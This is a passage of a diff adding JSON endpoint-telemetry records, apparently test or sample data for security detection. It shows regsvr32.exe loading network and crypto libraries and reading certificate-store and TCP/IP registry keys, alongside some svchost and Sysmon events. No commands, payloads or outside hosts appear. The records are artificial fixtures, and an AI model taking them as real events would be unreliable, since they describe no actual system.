"timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2164, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" + }, + { + "event_type": "registry", + "pid": 2164, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" + }, + { + "event_type": "registry", + "pid": 2164, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "dpapi.dll", + "image_path": "C:\\Windows\\System32\\dpapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "rsaenh.dll", + "image_path": "C:\\Windows\\System32\\rsaenh.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", + "registry_value": "ROOT", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", + "registry_value": "ROOT", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot", + "registry_value": "AuthRoot", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot", + "registry_value": "SmartCardRoot", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + 
"process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "rasadhlp.dll", + "image_path": "C:\\Windows\\System32\\rasadhlp.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + 
"unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573238230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573238400000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wininet.dll", + "image_path": "C:\\Windows\\System32\\wininet.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", 
+ "timestamp": 131883573237930000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238400000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "schannel.dll", + "image_path": "C:\\Windows\\System32\\schannel.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238700016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL", + "registry_value": "SCHANNEL", + "timestamp": 131883573238700016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "mskeyprotect.dll", + "image_path": "C:\\Windows\\System32\\mskeyprotect.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573238869984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 2012, + "process_name": 
